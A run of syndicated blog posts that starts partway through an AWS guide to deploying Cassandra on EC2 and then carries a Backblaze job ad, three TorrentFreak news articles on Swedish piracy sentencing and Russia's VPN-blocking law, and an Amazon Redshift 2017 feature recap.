  • Single AWS Region, 3 Availability Zones
  • Active-active, multi-Region
  • Active-standby, multi-Region

Single region, 3 Availability Zones

In this pattern, you deploy the Cassandra cluster in one AWS Region and three Availability Zones. There is only one ring in the cluster. By using EC2 instances in three zones, you ensure that the replicas are distributed uniformly in all zones.

To ensure the even distribution of data across all Availability Zones, we recommend that you distribute the EC2 instances evenly in all three Availability Zones. The number of EC2 instances in the cluster is a multiple of three (the replication factor).

This pattern is suitable in situations where the application is deployed in one Region or where deployments in different Regions should be constrained to the same Region because of data privacy or other legal requirements.

Pros Cons

●     Highly available, can sustain failure of one Availability Zone.

●     Simple deployment

●     Does not protect in a situation when many of the resources in a Region are experiencing intermittent failure.


Active-active, multi-Region

In this pattern, you deploy two rings in two different Regions and link them. The VPCs in the two Regions are peered so that data can be replicated between two rings.

We recommend that the two rings in the two Regions be identical in nature, having the same number of nodes, instance types, and storage configuration.

This pattern is most suitable when the applications using the Cassandra cluster are deployed in more than one Region.

Pros Cons

●     No data loss during failover.

●     Highly available, can sustain when many of the resources in a Region are experiencing intermittent failures.

●     Read/write traffic can be localized to the closest Region for the user for lower latency and higher performance.

●     High operational overhead

●     The second Region effectively doubles the cost


Active-standby, multi-region

In this pattern, you deploy two rings in two different Regions and link them. The VPCs in the two Regions are peered so that data can be replicated between two rings.

However, the second Region does not receive traffic from the applications. It only functions as a secondary location for disaster recovery reasons. If the primary Region is not available, the second Region receives traffic.

We recommend that the two rings in the two Regions be identical in nature, having the same number of nodes, instance types, and storage configuration.

This pattern is most suitable when the applications using the Cassandra cluster require low recovery point objective (RPO) and recovery time objective (RTO).

Pros Cons

●     No data loss during failover.

●     Highly available, can sustain failure or partitioning of one whole Region.

●     High operational overhead.

●     High latency for writes for eventual consistency.

●     The second Region effectively doubles the cost.

Storage options

In on-premises deployments, Cassandra deployments use local disks to store data. There are two storage options for EC2 instances:

Your choice of storage is closely related to the type of workload supported by the Cassandra cluster. Instance store works best for most general purpose Cassandra deployments. However, in certain read-heavy clusters, Amazon EBS is a better choice.

The choice of instance type is generally driven by the type of storage:

  • If ephemeral storage is required for your application, a storage-optimized (I3) instance is the best option.
  • If your workload requires Amazon EBS, it is best to go with compute-optimized (C5) instances.
  • Burstable instance types (T2) don’t offer good performance for Cassandra deployments.

Instance store

Ephemeral storage is local to the EC2 instance. It may provide high input/output operations per second (IOPs) based on the instance type. An SSD-based instance store can support up to 3.3M IOPS in I3 instances. This high performance makes it an ideal choice for transactional or write-intensive applications such as Cassandra.

In general, instance storage is recommended for transactional, large, and medium-size Cassandra clusters. For a large cluster, read/write traffic is distributed across a higher number of nodes, so the loss of one node has less of an impact. However, for smaller clusters, a quick recovery for the failed node is important.

As an example, for a cluster with 100 nodes, the loss of 1 node is 3.33% loss (with a replication factor of 3). Similarly, for a cluster with 10 nodes, the loss of 1 node is 33% less capacity (with a replication factor of 3).

  Ephemeral storage Amazon EBS Comments


(translates to higher query performance)

Up to 3.3M on I3




This results in a higher query performance on each host. However, Cassandra implicitly scales well in terms of horizontal scale. In general, we recommend scaling horizontally first. Then, scale vertically to mitigate specific issues.


Note: 3.3M IOPS is observed with 100% random read with a 4-KB block size on Amazon Linux.

AWS instance types I3 Compute optimized, C5 Being able to choose between different instance types is an advantage in terms of CPU, memory, etc., for horizontal and vertical scaling.
Backup/ recovery Custom Basic building blocks are available from AWS.

Amazon EBS offers distinct advantage here. It is small engineering effort to establish a backup/restore strategy.

a) In case of an instance failure, the EBS volumes from the failing instance are attached to a new instance.

b) In case of an EBS volume failure, the data is restored by creating a new EBS volume from last snapshot.

Amazon EBS

EBS volumes offer higher resiliency, and IOPs can be configured based on your storage needs. EBS volumes also offer some distinct advantages in terms of recovery time. EBS volumes can support up to 32K IOPS per volume and up to 80K IOPS per instance in RAID configuration. They have an annualized failure rate (AFR) of 0.1–0.2%, which makes EBS volumes 20 times more reliable than typical commodity disk drives.

The primary advantage of using Amazon EBS in a Cassandra deployment is that it reduces data-transfer traffic significantly when a node fails or must be replaced. The replacement node joins the cluster much faster. However, Amazon EBS could be more expensive, depending on your data storage needs.

Cassandra has built-in fault tolerance by replicating data to partitions across a configurable number of nodes. It can not only withstand node failures but if a node fails, it can also recover by copying data from other replicas into a new node. Depending on your application, this could mean copying tens of gigabytes of data. This adds additional delay to the recovery process, increases network traffic, and could possibly impact the performance of the Cassandra cluster during recovery.

Data stored on Amazon EBS is persisted in case of an instance failure or termination. The node’s data stored on an EBS volume remains intact and the EBS volume can be mounted to a new EC2 instance. Most of the replicated data for the replacement node is already available in the EBS volume and won’t need to be copied over the network from another node. Only the changes made after the original node failed need to be transferred across the network. That makes this process much faster.

EBS volumes are snapshotted periodically. So, if a volume fails, a new volume can be created from the last known good snapshot and be attached to a new instance. This is faster than creating a new volume and coping all the data to it.

Most Cassandra deployments use a replication factor of three. However, Amazon EBS does its own replication under the covers for fault tolerance. In practice, EBS volumes are about 20 times more reliable than typical disk drives. So, it is possible to go with a replication factor of two. This not only saves cost, but also enables deployments in a region that has two Availability Zones.

EBS volumes are recommended in case of read-heavy, small clusters (fewer nodes) that require storage of a large amount of data. Keep in mind that the Amazon EBS provisioned IOPS could get expensive. General purpose EBS volumes work best when sized for required performance.


If your cluster is expected to receive high read/write traffic, select an instance type that offers 10–Gb/s performance. As an example, i3.8xlarge and c5.9xlarge both offer 10–Gb/s networking performance. A smaller instance type in the same family leads to a relatively lower networking throughput.

Cassandra generates a universal unique identifier (UUID) for each node based on IP address for the instance. This UUID is used for distributing vnodes on the ring.

In the case of an AWS deployment, IP addresses are assigned automatically to the instance when an EC2 instance is created. With the new IP address, the data distribution changes and the whole ring has to be rebalanced. This is not desirable.

To preserve the assigned IP address, use a secondary elastic network interface with a fixed IP address. Before swapping an EC2 instance with a new one, detach the secondary network interface from the old instance and attach it to the new one. This way, the UUID remains same and there is no change in the way that data is distributed in the cluster.

If you are deploying in more than one region, you can connect the two VPCs in two regions using cross-region VPC peering.

High availability and resiliency

Cassandra is designed to be fault-tolerant and highly available during multiple node failures. In the patterns described earlier in this post, you deploy Cassandra to three Availability Zones with a replication factor of three. Even though it limits the AWS Region choices to the Regions with three or more Availability Zones, it offers protection for the cases of one-zone failure and network partitioning within a single Region. The multi-Region deployments described earlier in this post protect when many of the resources in a Region are experiencing intermittent failure.

Resiliency is ensured through infrastructure automation. The deployment patterns all require a quick replacement of the failing nodes. In the case of a regionwide failure, when you deploy with the multi-Region option, traffic can be directed to the other active Region while the infrastructure is recovering in the failing Region. In the case of unforeseen data corruption, the standby cluster can be restored with point-in-time backups stored in Amazon S3.


In this section, we look at ways to ensure that your Cassandra cluster is healthy:

  • Scaling
  • Upgrades
  • Backup and restore


Cassandra is horizontally scaled by adding more instances to the ring. We recommend doubling the number of nodes in a cluster to scale up in one scale operation. This leaves the data homogeneously distributed across Availability Zones. Similarly, when scaling down, it’s best to halve the number of instances to keep the data homogeneously distributed.

Cassandra is vertically scaled by increasing the compute power of each node. Larger instance types have proportionally bigger memory. Use deployment automation to swap instances for bigger instances without downtime or data loss.


All three types of upgrades (Cassandra, operating system patching, and instance type changes) follow the same rolling upgrade pattern.

In this process, you start with a new EC2 instance and install software and patches on it. Thereafter, remove one node from the ring. For more information, see Cassandra cluster Rolling upgrade. Then, you detach the secondary network interface from one of the EC2 instances in the ring and attach it to the new EC2 instance. Restart the Cassandra service and wait for it to sync. Repeat this process for all nodes in the cluster.

Backup and restore

Your backup and restore strategy is dependent on the type of storage used in the deployment. Cassandra supports snapshots and incremental backups. When using instance store, a file-based backup tool works best. Customers use rsync or other third-party products to copy data backups from the instance to long-term storage. For more information, see Backing up and restoring data in the DataStax documentation. This process has to be repeated for all instances in the cluster for a complete backup. These backup files are copied back to new instances to restore. We recommend using S3 to durably store backup files for long-term storage.

For Amazon EBS based deployments, you can enable automated snapshots of EBS volumes to back up volumes. New EBS volumes can be easily created from these snapshots for restoration.


We recommend that you think about security in all aspects of deployment. The first step is to ensure that the data is encrypted at rest and in transit. The second step is to restrict access to unauthorized users. For more information about security, see the Cassandra documentation.

Encryption at rest

Encryption at rest can be achieved by using EBS volumes with encryption enabled. Amazon EBS uses AWS KMS for encryption. For more information, see Amazon EBS Encryption.

Instance store–based deployments require using an encrypted file system or an AWS partner solution. If you are using DataStax Enterprise, it supports transparent data encryption.

Encryption in transit

Cassandra uses Transport Layer Security (TLS) for client and internode communications.


The security mechanism is pluggable, which means that you can easily swap out one authentication method for another. You can also provide your own method of authenticating to Cassandra, such as a Kerberos ticket, or if you want to store passwords in a different location, such as an LDAP directory.


The authorizer that’s plugged in by default is org.apache.cassandra.auth.Allow AllAuthorizer. Cassandra also provides a role-based access control (RBAC) capability, which allows you to create roles and assign permissions to these roles.


In this post, we discussed several patterns for running Cassandra in the AWS Cloud. This post describes how you can manage Cassandra databases running on Amazon EC2. AWS also provides managed offerings for a number of databases. To learn more, see Purpose-built databases for all your application needs.

If you have questions or suggestions, please comment below.

Additional Reading

If you found this post useful, be sure to check out Analyze Your Data on Amazon DynamoDB with Apache Spark and Analysis of Top-N DynamoDB Objects using Amazon Athena and Amazon QuickSight.

About the Authors

Prasad Alle is a Senior Big Data Consultant with AWS Professional Services. He spends his time leading and building scalable, reliable Big data, Machine learning, Artificial Intelligence and IoT solutions for AWS Enterprise and Strategic customers. His interests extend to various technologies such as Advanced Edge Computing, Machine learning at Edge. In his spare time, he enjoys spending time with his family.




Provanshu Dey is a Senior IoT Consultant with AWS Professional Services. He works on highly scalable and reliable IoT, data and machine learning solutions with our customers. In his spare time, he enjoys spending time with his family and tinkering with electronics & gadgets.




Wanted: Senior Systems Administrator

Post Syndicated from Yev original https://www.backblaze.com/blog/wanted-senior-systems-administrator/

Wanted: Senior Systems Administrator

We’re looking for someone who enjoys solving difficult problems, running down elusive tech gremlins, and improving our environment one server at a time. If you enjoy being stretched, learning new skills, and want to look forward to seeing your co-workers every day, then we want you!

Backblaze is a small (in headcount) cloud storage (and backup!) company with a big mission, bringing feature-rich and accessible services to the masses, even if they don’t have unlimited VC funding (because we don’t either)! We believe in a fun and positive work environment where people can learn and grow, and where a sense of community is not just a buzzword from a company handbook (though you might probably find it in there).

What You’ll Be Doing

  • Mastering your craft, becoming a subject matter expert, and acting as an escalation point for areas of expertise (this means responding to pages in your areas of ownership as well)
  • Leading projects across a range of IT operations disciplines
  • Developing a thorough understanding of the environment and the skills necessary to troubleshoot all systems and services
  • Collaborating closely with other teams (Engineering, Infrastructure, etc.) to build out new systems and improve existing ones
  • Participating in on-call rotation when necessary
  • Petting the office dogs when appropriate

What You Should Have

  • 5+ years of work as a Systems Administrator (or equivalent college degree)
  • Expert knowledge of Linux systems administration (Debian preferred)
  • Ability to work under pressure in a fast-paced startup environment
  • A passion for build and improving all manner of systems and services
  • Excellent problem solving, investigative, and troubleshooting skills
  • Strong interpersonal communication skills
  • Local enough to commute to San Mateo office

Highly Desirable Skills

  • Experience working at a technology/software startup
  • Configuration management and automation software (Ansible preferred)
  • Familiarity with server and storage system hardware and configurations
  • Understanding of Java servlet containers (Tomcat preferred)
  • Skill in administration of different software suites and cloud-based integrations (G Suite, PagerDuty, etc.)
  • Comprehension of standard web services and packages (WordPress, Apache, etc.)

Some Backblaze Perks

  • Generous healthcare plans
  • Competitive compensation and 401k
  • All employees receive Option grants
  • Unlimited vacation days
  • Strong coffee
  • Fully stocked Micro kitchens
  • Weekly catered breakfast and lunches
  • Awesome people who work on awesome projects
  • Childcare bonus (human children only)
  • Get to bring your (well behaved) pets into the office
  • Backblaze is an Equal Opportunity Employer and we offer competitive salary and benefits, including our no policy vacation policy

If this sounds like you — follow these steps:

  1. Send an email to jobscontact@backblaze.com with the position in the subject line.
  2. Include your resume.
  3. Tell us a bit about your experience and why you’re excited to work with Backblaze.

The post Wanted: Senior Systems Administrator appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Hollywood Commissioned Tough Jail Sentences for Online Piracy, ISP Says

Post Syndicated from Andy original https://torrentfreak.com/hollywood-commissioned-tough-jail-sentences-for-online-piracy-isp-says-180227/

According to local prosecutors who have handled many copyright infringement cases over the past decade, Sweden is nowhere near tough enough on those who commit online infringement.

With this in mind, the government sought advice on how such crimes should be punished, not only more severely, but also in proportion to the damages alleged to have been caused by defendants’ activities.

The corresponding report was returned to Minister for Justice Heléne Fritzon earlier this month by Council of Justice member Dag Mattsson. The paper proposed a new tier of offenses that should receive special punishment when there are convictions for large-scale copyright infringement and “serious” trademark infringement.

Partitioning the offenses into two broad categories, the report envisions those found guilty of copyright infringement or trademark infringement “of a normal grade” may be sentenced to fines or imprisonment up to a maximum of two years. For those at the other end of the scale, engaged in “cases of gross crimes”, the penalty sought is a minimum of six months in prison and not more than six years.

The proposals have been criticized by those who feel that copyright infringement shouldn’t be put on a par with more serious and even potentially violent crimes. On the other hand, tools to deter larger instances of infringement have been welcomed by entertainment industry groups, who have long sought more robust sentencing options in order to protect their interests.

In the middle, however, are Internet service providers such as Bahnhof, who are often dragged into the online piracy debate due to the allegedly infringing actions of some of their customers. In a statement on the new proposals, the company is clear on why Sweden is preparing to take such a tough stance against infringement.

“It’s not a daring guess that media companies are asking for Sweden to tighten the penalty for illegal file sharing and streaming,” says Bahnhof lawyer Wilhelm Dahlborn.

“It would have been better if the need for legislative change had taken place at EU level and co-ordinated with other similar intellectual property legislation.”

Bahnhof chief Jon Karlung, who is never afraid to speak his mind on such matters, goes a step further. He believes the initiative amounts to a gift to the United States.

“It’s nothing but a commission from the American film industry,” Karlung says.

“I do not mind them going for their goals in court and trying to protect their interests, but it does not mean that the state, the police, and ultimately taxpayers should put mass resources on it.”

Bahnhof notes that the proposals for the toughest extended jail sentences aren’t directly aimed at petty file-sharers. However, the introduction of a new offense of “gross crime” means that the limitation period shifts from the current five years to ten.

It also means that due to the expansion of prison terms beyond two years, secret monitoring of communications (known as HÖK) could come into play.

“If the police have access to HÖK, it can be used to get information about which individuals are file sharing,” warns Bahnhof lawyer Wilhelm Dahlborn.

“One can also imagine a scenario where media companies increasingly report crime as gross in order to get the police to do the investigative work they have previously done. Harder punishments to tackle file-sharing also appear very old-fashioned and equally ineffective.”

As noted in our earlier report, the new proposals also include measures that would enable the state to confiscate all kinds of property, both physical items and more intangible assets such as domain names. Bahnhof also takes issue with this, noting that domains are not the problem here.

“In our opinion, it is not the domain name which is the problem, it is the content of the website that the domain name points to,” the company says.

“Moreover, confiscation of a domain name may conflict with constitutional rules on freedom of expression in a way that is very unfortunate. The issues of freedom of expression and why copyright infringement is to be treated differently haven’t been addressed much in the investigation.”

Under the new proposals, damage to rightsholders and monetary gain by the defendant would also be taken into account when assessing whether a crime is “gross” or not. This raises questions as to what extent someone could be held liable for piracy when a rightsholder maintains damage was caused yet no profit was generated.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

Pirate Site Operators’ Jail Sentences Overturned By Court of Appeal

Post Syndicated from Andy original https://torrentfreak.com/pirate-site-operators-jail-sentences-overturned-by-court-of-appeal-180226/

With The Pirate Bay proving to be somewhat of an elusive and irritating target, in 2014 police took on a site capturing an increasing portion of the Swedish pirate market.

Unlike The Pirate Bay which uses torrents, Dreamfilm was a portal for streaming content and it quickly grew alongside the now-defunct Swefilmer to dominate the local illicit in-browser viewing sector. But after impressive growth, things came to a sudden halt.

In January 2015, Dreamfilm announced that the site would be shut down after one of its administrators was detained by the authorities and interrogated. A month later, several more Sweden-based sites went down including the country’s second largest torrent site Tankefetast, torrent site PirateHub, and streaming portal Tankefetast Play (TFPlay).

Anti-piracy group Rights Alliance described the four-site networks as one of “Europe’s leading players for illegal file sharing and streaming.”

Image published by Dreamfilm after the raiddreamfilm

After admitting they’d been involved in the sites but insisting they’d committed no crimes, last year four men aged between 21 and 31-years-old appeared in court charged with copyright infringement. It didn’t go well.

The Linköping District Court found them guilty and decided they should all go to prison, with the then 23-year-old founder receiving the harshest sentence of 10 months, a member of the Pirate Party who reportedly handled advertising receiving 8 months, and two others getting six months each. On top, they were ordered to pay damages of SEK 1,000,000 ($122,330) to film industry plaintiffs.

Like many similar cases in Sweden, the case went to appeal and late last week the court handed down its decision which amends the earlier decision in several ways.

Firstly, the Hovrätten (Court of Appeals) agreed that with the District Court’s ruling that the defendants had used dreamfilm.se, tfplay.org, tankafetast.com and piratehub.net as platforms to deliver movies stored on Russian servers to the public.

One defendant owned the domains, another worked as a site supervisor, while the other pair worked as a programmer and in server acquisition, the Court said.

Dagens Juridik reports that the defendants argued that the websites were not a prerequisite for people to access the films, and therefore they had not been made available to a new market.

However, the Court of Appeal agreed with the District Court’s assessment that the links meant that the movies had been made available to a “new audience”, which under EU law means that a copyright infringement had been committed. As far as the samples presented in the case would allow, the men were found to have committed between 45 and 118 breaches of copyright law.

The Court also found that the website operation had a clear financial motive, delivering movies to the public for free while earning money from advertising.

While agreeing with the District Court on most points, the Court of Appeals decided to boost the damages award from SEK 1,000,000 ($122,330) to SEK 4,250,000 ($519,902). However, there was much better news in respect of the prison sentences.

Taking into consideration the young age of the men (who before this case had no criminal records) and the unlikely event that they would offend again, the Court decided that none would have to go to prison as previously determined.

Instead, all of the men were handed conditional sentences with two ordered to pay daily fines, which are penalties based on the offender’s daily personal income.

Last week it was reported that Sweden is preparing to take a tougher line with large-scale online copyright infringers. Proposals currently with the government foresee a new crime of “gross infringement” under both copyright and trademark law, which could lead to sentences of up to six years in prison.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

Russia VPN Blocking Law Failing? No Provider Told To Block Any Site

Post Syndicated from Andy original https://torrentfreak.com/russia-vpn-blocking-law-failing-no-provider-told-to-block-any-site-180224/

Continuing Russia’s continued pressure on the restriction of banned websites for copyright infringement and other offenses, President Vladimir Putin signed a brand new bill into law July 2017.

The legislation aimed to prevent citizens from circumventing ISP blockades with the use of services such as VPNs, proxies, Tor, and other anonymizing services. The theory was that if VPNs were found to be facilitating access to banned sites, they too would find themselves on Russia’s national Internet blacklist.

The list is maintained by local telecoms watchdog Rozcomnadzor and currently contains many tens of thousands of restricted domains. In respect of VPNs, the Federal Security Service (FSB) and the Ministry of Internal Affairs is tasked with monitoring ‘unblocking’ offenses, which they are then expected to refer to the telecoms watchdog for action.

The legislation caused significant uproar both locally and overseas and was widely predicted to signal a whole new level of censorship in Russia. However, things haven’t played out that way since, far from it. Since being introduced November 1, 2017, not a single VPN has been cautioned over its activities, much less advised to block or cease and desist.

The revelation comes via Russian news outlet RBC, which received an official confirmation from Rozcomnadzor itself that no VPN or anonymization service had been asked to take action to prevent access to blocked sites. Given the attention to detail when passing the law, the reasons seem extraordinary.

While Rozcomnadzor is empowered to put VPN providers on the blacklist, it must first be instructed to do so by the FSB, after that organization has carried out an investigation. Once the FSB gives the go-ahead, Rozcomnadzor can then order the provider to connect itself to the federal state information system, known locally as FGIS.

FGIS is the system that contains the details of nationally blocked sites and if a VPN provider does not interface with it within 30 days of being ordered to do so, it too will be added to the blocklist by Rozcomnadzor. Trouble is, Rozcomnadzor hasn’t received any requests to contact VPNs from higher up the chain, so they can’t do anything.

“As of today, there have been no requests from the members of the RDD [operational and investigative activities] and state security regarding anonymizers and VPN services,” a Roskomnadzor spokesperson said.

However, the problems don’t end there. RBC quotes Karen Ghazaryan, an analyst at the Russian Electronic Communications Association (RAEC), who says that even if it had received instructions, Rozcomnadzor wouldn’t be able to block the VPN services in question for both technical and legal reasons.

“Roskomnadzor does not have leverage over most VPN services, and they can not block them for failing to comply with the law, because Roskomnadzor does not have ready technical solutions for this, and the law does not yet have relevant by-laws,” the expert said.

“Copying the Chinese model of fighting VPNs in Russia will not be possible because of its high cost and the radically different topology of the Russian segment of the Internet,” Ghazaryan adds.

This apparent inability to act is surprising, not least since millions of Russian Internet users are now using VPNs, anonymizers, and similar services on a regular basis. Ghazaryan puts the figure as high as 25% of all Russian Internet users.

However, there is also a third element to Russia’s VPN dilemma – how to differentiate between VPNs used by the public and those used in a commercial environment. China is trying to solve this problem by forcing VPN providers to register and align themselves with the state. Russia hasn’t tried that, yet.

“The [blocking] law says that it does not apply to corporate VPN networks, but there is no way to distinguish them from services used for personal needs,” concludes Sarkis Darbinian from the anti-censorship project, Roskomvoboda.

This week, Russia’s Ministry of Culture unveiled yet more new proposals for dealing with copyright infringement via a bill that would allow websites to be blocked without a court order. It’s envisioned that if pirate material is found on a site and its operator either fails to respond to a complaint or leaves the content online for more than 24 hours, ISPs will be told to block the entire site.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

Amazon Redshift – 2017 Recap

Post Syndicated from Larry Heathcote original https://aws.amazon.com/blogs/big-data/amazon-redshift-2017-recap/

We have been busy adding new features and capabilities to Amazon Redshift, and we wanted to give you a glimpse of what we’ve been doing over the past year. In this article, we recap a few of our enhancements and provide a set of resources that you can use to learn more and get the most out of your Amazon Redshift implementation.

In 2017, we made more than 30 announcements about Amazon Redshift. We listened to you, our customers, and delivered Redshift Spectrum, a feature of Amazon Redshift, that gives you the ability to extend analytics to your data lake—without moving data. We launched new DC2 nodes, doubling performance at the same price. We also announced many new features that provide greater scalability, better performance, more automation, and easier ways to manage your analytics workloads.

To see a full list of our launches, visit our what’s new page—and be sure to subscribe to our RSS feed.

Major launches in 2017

Amazon Redshift Spectrumextend analytics to your data lake, without moving data

We launched Amazon Redshift Spectrum to give you the freedom to store data in Amazon S3, in open file formats, and have it available for analytics without the need to load it into your Amazon Redshift cluster. It enables you to easily join datasets across Redshift clusters and S3 to provide unique insights that you would not be able to obtain by querying independent data silos.

With Redshift Spectrum, you can run SQL queries against data in an Amazon S3 data lake as easily as you analyze data stored in Amazon Redshift. And you can do it without loading data or resizing the Amazon Redshift cluster based on growing data volumes. Redshift Spectrum separates compute and storage to meet workload demands for data size, concurrency, and performance. Redshift Spectrum scales processing across thousands of nodes, so results are fast, even with massive datasets and complex queries. You can query open file formats that you already use—such as Apache Avro, CSV, Grok, ORC, Apache Parquet, RCFile, RegexSerDe, SequenceFile, TextFile, and TSV—directly in Amazon S3, without any data movement.

For complex queries, Redshift Spectrum provided a 67 percent performance gain,” said Rafi Ton, CEO, NUVIAD. “Using the Parquet data format, Redshift Spectrum delivered an 80 percent performance improvement. For us, this was substantial.

To learn more about Redshift Spectrum, watch our AWS Summit session Intro to Amazon Redshift Spectrum: Now Query Exabytes of Data in S3, and read our announcement blog post Amazon Redshift Spectrum – Exabyte-Scale In-Place Queries of S3 Data.

DC2 nodes—twice the performance of DC1 at the same price

We launched second-generation Dense Compute (DC2) nodes to provide low latency and high throughput for demanding data warehousing workloads. DC2 nodes feature powerful Intel E5-2686 v4 (Broadwell) CPUs, fast DDR4 memory, and NVMe-based solid state disks (SSDs). We’ve tuned Amazon Redshift to take advantage of the better CPU, network, and disk on DC2 nodes, providing up to twice the performance of DC1 at the same price. Our DC2.8xlarge instances now provide twice the memory per slice of data and an optimized storage layout with 30 percent better storage utilization.

Redshift allows us to quickly spin up clusters and provide our data scientists with a fast and easy method to access data and generate insights,” said Bradley Todd, technology architect at Liberty Mutual. “We saw a 9x reduction in month-end reporting time with Redshift DC2 nodes as compared to DC1.”

Read our customer testimonials to see the performance gains our customers are experiencing with DC2 nodes. To learn more, read our blog post Amazon Redshift Dense Compute (DC2) Nodes Deliver Twice the Performance as DC1 at the Same Price.

Performance enhancements— 3x-5x faster queries

On average, our customers are seeing 3x to 5x performance gains for most of their critical workloads.

We introduced short query acceleration to speed up execution of queries such as reports, dashboards, and interactive analysis. Short query acceleration uses machine learning to predict the execution time of a query, and to move short running queries to an express short query queue for faster processing.

We launched results caching to deliver sub-second response times for queries that are repeated, such as dashboards, visualizations, and those from BI tools. Results caching has an added benefit of freeing up resources to improve the performance of all other queries.

We also introduced late materialization to reduce the amount of data scanned for queries with predicate filters by batching and factoring in the filtering of predicates before fetching data blocks in the next column. For example, if only 10 percent of the table rows satisfy the predicate filters, Amazon Redshift can potentially save 90 percent of the I/O for the remaining columns to improve query performance.

We launched query monitoring rules and pre-defined rule templates. These features make it easier for you to set metrics-based performance boundaries for workload management (WLM) queries, and specify what action to take when a query goes beyond those boundaries. For example, for a queue that’s dedicated to short-running queries, you might create a rule that aborts queries that run for more than 60 seconds. To track poorly designed queries, you might have another rule that logs queries that contain nested loops.

Customer insights

Amazon Redshift and Redshift Spectrum serve customers across a variety of industries and sizes, from startups to large enterprises. Visit our customer page to see the success that customers are having with our recent enhancements. Learn how companies like Liberty Mutual Insurance saw a 9x reduction in month-end reporting time using DC2 nodes. On this page, you can find case studies, videos, and other content that show how our customers are using Amazon Redshift to drive innovation and business results.

In addition, check out these resources to learn about the success our customers are having building out a data warehouse and data lake integration solution with Amazon Redshift:

Partner solutions

You can enhance your Amazon Redshift data warehouse by working with industry-leading experts. Our AWS Partner Network (APN) Partners have certified their solutions to work with Amazon Redshift. They offer software, tools, integration, and consulting services to help you at every step. Visit our Amazon Redshift Partner page and choose an APN Partner. Or, use AWS Marketplace to find and immediately start using third-party software.

To see what our Partners are saying about Amazon Redshift Spectrum and our DC2 nodes mentioned earlier, read these blog posts:


Blog posts

Visit the AWS Big Data Blog for a list of all Amazon Redshift articles.

YouTube videos


Our community of experts contribute on GitHub to provide tips and hints that can help you get the most out of your deployment. Visit GitHub frequently to get the latest technical guidance, code samples, administrative task automation utilities, the analyze & vacuum schema utility, and more.

Customer support

If you are evaluating or considering a proof of concept with Amazon Redshift, or you need assistance migrating your on-premises or other cloud-based data warehouse to Amazon Redshift, our team of product experts and solutions architects can help you with architecting, sizing, and optimizing your data warehouse. Contact us using this support request form, and let us know how we can assist you.

If you are an Amazon Redshift customer, we offer a no-cost health check program. Our team of database engineers and solutions architects give you recommendations for optimizing Amazon Redshift and Amazon Redshift Spectrum for your specific workloads. To learn more, email us at [email protected].

If you have any questions, email us at [email protected].


Additional Reading

If you found this post useful, be sure to check out Amazon Redshift Spectrum – Exabyte-Scale In-Place Queries of S3 Data, Using Amazon Redshift for Fast Analytical Reports and How to Migrate Your Oracle Data Warehouse to Amazon Redshift Using AWS SCT and AWS DMS.

About the Author

Larry Heathcote is a Principle Product Marketing Manager at Amazon Web Services for data warehousing and analytics. Larry is passionate about seeing the results of data-driven insights on business outcomes. He enjoys family time, home projects, grilling out and the taste of classic barbeque.